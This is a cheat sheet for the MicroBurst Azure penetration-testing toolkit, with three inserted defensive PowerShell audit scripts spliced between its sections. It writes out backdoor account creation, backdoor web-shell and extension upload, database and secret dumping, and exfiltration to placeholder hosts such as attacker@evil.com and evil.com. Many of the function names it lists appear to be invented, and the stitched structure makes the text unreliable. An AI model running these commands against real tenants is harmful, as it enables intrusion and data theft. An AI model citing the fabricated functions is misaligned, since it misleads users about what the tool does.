MicroBurst Azure Security Testing Toolkit Cheat Sheet
Overview
MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing Microsoft Azure security. It includes tools for Azure service discovery, privilege escalation, lateral movement, and data exfiltration, making it a comprehensive toolkit for Azure penetration testing.
⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.
Installation
PowerShell Gallery Installation
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Manual Installation
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
Git Installation
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
Basic Usage
Module Setup
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Authentication
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Command Reference
Reconnaissance Functions
Function | Description |
---|---|
Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs |
Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains |
Get-AzurePasswords | Extract passwords from Azure resources |
Get-AzureDomainInfo | Get domain information |
Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs |
Storage Account Functions
Function | Description |
---|---|
Invoke-EnumerateAzureBlobs | Find accessible storage blobs |
Get-AzureBlobFiles | Download files from storage |
Invoke-AzureStorageAccountEnum | Enumerate storage accounts |
Get-AzureStorageAccountKeys | Extract storage account keys |
Virtual Machine Functions
Function | Description |
---|---|
Invoke-AzureRmVmBulkCMD | Bulk command execution |
Get-AzureVMDisk | Access VM disk information |
Invoke-AzureVMUserDataEnum | Enumerate VM user data |
Get-AzureVMExtensionSettings | Get VM extension settings |
Azure Storage Enumeration
Blob Storage Discovery
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
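Blob enumeration works because anonymous container access and long-lived account keys are still enabled on many accounts. The following is an added defensive example, not part of MicroBurst or this cheat sheet's original content: it audits the storage accounts visible in the current Az context for exactly those settings using the standard Az.Storage cmdlets. It assumes Az.Accounts and Az.Storage are installed, Connect-AzAccount has been run, and the caller can read the accounts (and their keys, which Get-AzStorageContainer needs to list containers); the function name Get-StorageExposureReport and its ResourceGroupName parameter are this example's own.

```powershell
# Added defensive example (not MicroBurst code): report storage accounts that allow
# anonymous blob access or shared-key access, and list any containers already public.
# Assumes Az.Accounts + Az.Storage are installed and Connect-AzAccount has been run.
Import-Module Az.Accounts, Az.Storage

function Get-StorageExposureReport {
    param(
        # Hypothetical parameter: restrict the audit to one resource group; omit for all accounts.
        [string]$ResourceGroupName
    )

    $accounts = if ($ResourceGroupName) {
        Get-AzStorageAccount -ResourceGroupName $ResourceGroupName
    } else {
        Get-AzStorageAccount
    }

    foreach ($account in $accounts) {
        # Account-level switches. $null means "never set", which on older accounts
        # behaves as allowed, so only an explicit $false counts as disabled.
        $publicAllowed    = $account.AllowBlobPublicAccess -ne $false
        $sharedKeyAllowed = $account.AllowSharedKeyAccess -ne $false

        $publicContainers = @()
        $listError = $null
        try {
            # $account.Context is key-based; if shared-key access is disabled the listing
            # fails, which is itself a useful (and reported) signal.
            $publicContainers = @(Get-AzStorageContainer -Context $account.Context -ErrorAction Stop |
                Where-Object { $_.PublicAccess -and ("$($_.PublicAccess)" -notin 'Off', 'None') } |
                ForEach-Object { "$($_.Name) ($($_.PublicAccess))" })
        } catch {
            $listError = $_.Exception.Message
        }

        # Severity 2 = anonymous read is possible right now; 1 = allowed at account level; 0 = disabled.
        $severity = 0
        if ($publicAllowed) { $severity = 1 }
        if ($publicAllowed -and $publicContainers.Count -gt 0) { $severity = 2 }

        [pscustomobject]@{
            StorageAccount     = $account.StorageAccountName
            ResourceGroup      = $account.ResourceGroupName
            BlobPublicAccessOn = $publicAllowed
            SharedKeyAccessOn  = $sharedKeyAllowed
            PublicContainers   = ($publicContainers -join ', ')
            ListError          = $listError
            Severity           = $severity
        }
    }
}

# Usage: worst exposures first.
Get-StorageExposureReport | Sort-Object Severity -Descending | Format-Table -AutoSize
```

Accounts with Severity 2 are readable by anyone who guesses the account and container name, which is all the enumeration above does; the fix is to set AllowBlobPublicAccess to false at the account level rather than chasing individual containers, and to disable shared-key access where the workload can use Azure AD instead.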
Storage Account Enumeration
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
File Share Enumeration
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Subdomain and Service Discovery
Azure Subdomain Enumeration
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Service Discovery
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
DNS Enumeration
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Virtual Machine Exploitation
VM Command Execution
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
VM Disk Access
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
VM Extension Exploitation
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Credential and Secret Extraction
Password Extraction
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Certificate Extraction
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Configuration Data Extraction
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Database Exploitation
SQL Database Enumeration
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
SQL Database Access
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
CosmosDB Exploitation
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Web Application Exploitation
Web App Enumeration
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Web App Exploitation
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Function App Exploitation
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Privilege Escalation
Role Assignment Enumeration
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
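The privilege-escalation paths the functions above look for usually start from an over-broad role assignment. The following is an added defensive example, not MicroBurst code: it lists assignments of the broad built-in roles in the current subscription with the standard Get-AzRoleAssignment cmdlet and annotates the ones a least-privilege review should look at first. It assumes Az.Accounts and Az.Resources are installed and Connect-AzAccount/Set-AzContext have been run; the function name Get-PrivilegedAssignmentReport and its PrivilegedRoles parameter are this example's own, while the role names in the default list are real built-in Azure roles.

```powershell
# Added defensive example (not MicroBurst code): review broad role assignments in the
# current subscription. Assumes Az.Accounts + Az.Resources and an authenticated context.
Import-Module Az.Accounts, Az.Resources

function Get-PrivilegedAssignmentReport {
    param(
        # Built-in roles that grant control-plane write or the right to grant rights.
        [string[]]$PrivilegedRoles = @('Owner', 'Contributor', 'User Access Administrator',
                                       'Role Based Access Control Administrator')
    )

    $subscriptionScope = "/subscriptions/$((Get-AzContext).Subscription.Id)"

    Get-AzRoleAssignment |
        Where-Object { $PrivilegedRoles -contains $_.RoleDefinitionName } |
        ForEach-Object {
            # Classify the scope: management group and subscription are broad; a resource
            # group scope has exactly 5 path segments, anything longer is a single resource.
            $scopeKind = if ($_.Scope -like '/providers/Microsoft.Management/managementGroups/*') { 'ManagementGroup' }
                         elseif ($_.Scope -eq $subscriptionScope) { 'Subscription' }
                         elseif ($_.Scope -like "$subscriptionScope/resourceGroups/*" -and ($_.Scope -split '/').Count -eq 5) { 'ResourceGroup' }
                         else { 'Resource' }

            # Notes a reviewer wants: broad scope, non-human identities (one leaked secret
            # is enough), groups (membership must be checked), and orphaned principals.
            $riskNotes = @()
            if ($scopeKind -in 'ManagementGroup', 'Subscription') { $riskNotes += 'broad scope' }
            if ($_.ObjectType -eq 'ServicePrincipal') { $riskNotes += 'non-human identity' }
            if ($_.ObjectType -eq 'Group')            { $riskNotes += 'group (check membership)' }
            if ($_.ObjectType -eq 'Unknown')          { $riskNotes += 'orphaned principal (deleted object)' }

            $principal = if ($_.SignInName) { $_.SignInName } else { $_.DisplayName }

            [pscustomobject]@{
                Principal  = $principal
                ObjectType = $_.ObjectType
                Role       = $_.RoleDefinitionName
                ScopeKind  = $scopeKind
                Scope      = $_.Scope
                RiskNotes  = ($riskNotes -join '; ')
            }
        } | Sort-Object ScopeKind, Role
}

Get-PrivilegedAssignmentReport | Format-Table -AutoSize
```

Rows tagged "broad scope" together with "non-human identity" are the ones to cut first: a service principal with Contributor at subscription scope turns any leaked client secret or certificate into control of every resource in the subscription.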
Service Principal Abuse
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Managed Identity Exploitation
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Lateral Movement
Cross-Subscription Access
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Cross-Tenant Access
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Resource Group Pivoting
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Data Exfiltration
Bulk Data Extraction
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Stealth Exfiltration
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automation and Scripting
Automated Assessment Script
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @{
    AssessmentDate  = Get-Date
    SubscriptionId  = $SubscriptionId
    SubdomainsFound = $subdomains.Count
    BlobsFound      = $blobs.Count
    PasswordsFound  = $passwords.Count
    VMsFound        = $vms.Count
}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Continuous Monitoring
# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append
    try {
        # Check for new storage accounts
        $newStorage = Get-AzStorageAccount | Where-Object { $_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newStorage) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new VMs
        $newVMs = Get-AzVM | Where-Object { $_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newVMs) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        # Check for new role assignments
        $newRoles = Get-AzRoleAssignment | Where-Object { $_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes) }
        if ($newRoles) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }
    Start-Sleep -Seconds ($IntervalMinutes * 60)
}
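Polling resource lists only shows that something new exists; the Azure Activity Log records who performed which control-plane operation, which is the signal a defender wants for the techniques in this cheat sheet (role grants, storage key reads, VM run-command and extension use). The following is an added defensive example, not MicroBurst code or part of the monitoring script above. It runs offline over constructed sample events; for live use it assumes Az.Monitor is installed and Connect-AzAccount has been run, and it reads events from Get-AzActivityLog. The function names Find-SensitiveOperations and Get-OperationName and the watchlist variable are this example's own; the operation names in the watchlist are real Azure resource-provider operation names.

```powershell
# Added defensive example (not MicroBurst code): flag sensitive control-plane operations
# in Activity Log events. Sample events below are constructed so the block runs offline.
Import-Module Az.Accounts -ErrorAction SilentlyContinue

# Operations worth alerting on: role grants, storage key reads, VM run-command and
# extension deployment, Key Vault access policy changes.
$SensitiveOperations = @(
    'Microsoft.Authorization/roleAssignments/write',
    'Microsoft.Storage/storageAccounts/listKeys/action',
    'Microsoft.Storage/storageAccounts/regenerateKey/action',
    'Microsoft.Compute/virtualMachines/runCommand/action',
    'Microsoft.Compute/virtualMachines/extensions/write',
    'Microsoft.KeyVault/vaults/accessPolicies/write'
)

function Get-OperationName {
    param([object]$Record)
    # Az.Monitor has changed the event shape across versions: OperationName may be a
    # string, an object with .Value, or exposed as OperationNameValue. Absorb all three.
    if ($Record.PSObject.Properties['OperationNameValue'] -and $Record.OperationNameValue) { return $Record.OperationNameValue }
    if ($Record.OperationName -is [string]) { return $Record.OperationName }
    return $Record.OperationName.Value
}

function Find-SensitiveOperations {
    param(
        [Parameter(Mandatory)] [object[]]$Events,
        [string[]]$Watchlist = $SensitiveOperations,
        # Only operations that actually went through changed anything.
        [string[]]$Statuses = @('Succeeded', 'Accepted')
    )
    foreach ($e in $Events) {
        $op     = Get-OperationName $e
        $status = if ($e.Status -is [string]) { $e.Status } else { $e.Status.Value }
        if (($Watchlist -contains $op) -and ($Statuses -contains $status)) {
            [pscustomobject]@{
                Time      = $e.EventTimestamp
                Operation = $op
                Caller    = $e.Caller
                Resource  = $e.ResourceId
                Status    = $status
            }
        }
    }
}

# Constructed sample events with placeholder identifiers (not real data).
$sampleEvents = @(
    [pscustomobject]@{ EventTimestamp = [datetime]'2024-01-01T10:00:00Z'; OperationName = 'Microsoft.Compute/virtualMachines/read'
                       Status = 'Succeeded'; Caller = 'ops@example.test'
                       ResourceId = '/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm1' },
    [pscustomobject]@{ EventTimestamp = [datetime]'2024-01-01T10:05:00Z'; OperationName = 'Microsoft.Authorization/roleAssignments/write'
                       Status = 'Succeeded'; Caller = 'sp-build-pipeline'
                       ResourceId = '/subscriptions/SUB-PLACEHOLDER/providers/Microsoft.Authorization/roleAssignments/ROLEASSIGNMENT-PLACEHOLDER' },
    [pscustomobject]@{ EventTimestamp = [datetime]'2024-01-01T10:06:00Z'; OperationName = 'Microsoft.Storage/storageAccounts/listKeys/action'
                       Status = 'Failed'; Caller = 'sp-build-pipeline'
                       ResourceId = '/subscriptions/SUB-PLACEHOLDER/resourceGroups/rg-data/providers/Microsoft.Storage/storageAccounts/stdata01' }
)

# Offline run: only the successful role-assignment write is reported; the failed
# listKeys call is dropped by the status filter but is worth a separate failed-attempt alert.
Find-SensitiveOperations -Events $sampleEvents | Format-Table -AutoSize

# Live use (assumption: Az.Monitor installed, authenticated context):
# Find-SensitiveOperations -Events (Get-AzActivityLog -StartTime (Get-Date).AddHours(-24) -MaxRecord 1000)
```

The Activity Log is retained for 90 days by default; route it to a Log Analytics workspace or SIEM if detections like this need to run continuously rather than from an interactive session.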
Troubleshooting
Authentication Issues
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}
# Verify subscription access
Get-AzSubscription
Module Issues
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Permission Issues
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}
Integration with Other Tools
BloodHound Integration
# Export data for BloodHound
$azureData = @{
    users             = Get-AzADUser
    groups            = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments   = Get-AzRoleAssignment
}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Metasploit Integration
# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Azure MicroBurst Integration',
      'Description' => 'Execute MicroBurst functions via Metasploit',
      'Author' => ['NetSPI'],
      'License' => MSF_LICENSE
    ))
    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end

  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']
    # Execute MicroBurst function
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"
    print_status("Executing: #{powershell_cmd}")
    # Execute PowerShell command
  end
end
Resources
- MicroBurst GitHub Repository
- NetSPI Blog
- Azure Security Documentation
- Azure Penetration Testing
- Azure Red Team Tactics
This cheat sheet provides a comprehensive reference for using MicroBurst. Always ensure you have proper authorization before conducting Azure security assessments.